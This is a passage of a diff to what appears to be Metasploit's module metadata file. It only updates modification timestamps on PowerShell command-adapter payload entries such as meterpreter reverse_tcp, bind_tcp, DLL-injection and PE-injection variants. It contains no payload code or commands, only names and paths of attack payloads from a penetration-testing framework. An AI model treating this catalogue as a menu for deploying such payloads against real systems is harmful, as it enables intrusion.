-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp",
@@ -172005,7 +172166,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp",
@@ -172044,7 +172205,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp",
@@ -172083,7 +172244,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid",
@@ -172122,7 +172283,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe",
@@ -172161,7 +172322,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp",
@@ -172200,7 +172361,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp",
@@ -172241,7 +172402,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4",
@@ -172280,7 +172441,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid",
@@ -172318,7 +172479,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/find_tag",
@@ -172359,7 +172520,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_hop_http",
@@ -172398,7 +172559,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_http",
@@ -172437,7 +172598,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore",
@@ -172476,7 +172637,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_https",
@@ -172517,7 +172678,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_https_proxy",
@@ -172556,7 +172717,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp",
@@ -172594,7 +172755,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe",
@@ -172633,7 +172794,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp",
@@ -172672,7 +172833,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp",
@@ -172711,7 +172872,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp",
@@ -172750,7 +172911,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports",
@@ -172790,7 +172951,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns",
@@ -172831,7 +172992,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4",
@@ -172872,7 +173033,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns",
@@ -172911,7 +173072,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid",
@@ -172951,7 +173112,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp",
@@ -172991,7 +173152,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps",
@@ -173026,7 +173187,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/metsvc_bind_tcp",
@@ -173061,7 +173222,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp",
@@ -173100,7 +173261,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -173139,7 +173300,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp",
@@ -173177,7 +173338,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp",
@@ -173216,7 +173377,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid",
@@ -173253,7 +173414,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe",
@@ -173290,7 +173451,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp",
@@ -173328,7 +173489,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp",
@@ -173368,7 +173529,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4",
@@ -173406,7 +173567,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid",
@@ -173442,7 +173603,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag",
@@ -173480,7 +173641,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp",
@@ -173517,7 +173678,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp",
@@ -173554,7 +173715,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp",
@@ -173592,7 +173753,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp",
@@ -173630,7 +173791,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports",
@@ -173669,7 +173830,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns",
@@ -173709,7 +173870,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4",
@@ -173749,7 +173910,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns",
@@ -173787,7 +173948,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid",
@@ -173826,7 +173987,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -173865,7 +174026,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp",
@@ -173903,7 +174064,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp",
@@ -173942,7 +174103,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid",
@@ -173979,7 +174140,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe",
@@ -174016,7 +174177,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp",
@@ -174054,7 +174215,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp",
@@ -174094,7 +174255,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4",
@@ -174132,7 +174293,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid",
@@ -174168,7 +174329,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag",
@@ -174206,7 +174367,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp",
@@ -174243,7 +174404,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp",
@@ -174280,7 +174441,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp",
@@ -174318,7 +174479,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp",
@@ -174356,7 +174517,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports",
@@ -174395,7 +174556,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns",
@@ -174435,7 +174596,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4",
@@ -174475,7 +174636,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns",
@@ -174513,7 +174674,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid",
@@ -174552,7 +174713,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp",
@@ -174591,7 +174752,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp",
@@ -174629,7 +174790,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp",
@@ -174668,7 +174829,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid",
@@ -174704,7 +174865,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe",
@@ -174740,7 +174901,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp",
@@ -174778,7 +174939,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_tcp",
@@ -174818,7 +174979,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4",
@@ -174855,7 +175016,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid",
@@ -174891,7 +175052,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/find_tag",
@@ -174929,7 +175090,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp",
@@ -174965,7 +175126,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe",
@@ -175001,7 +175162,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp",
@@ -175037,7 +175198,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
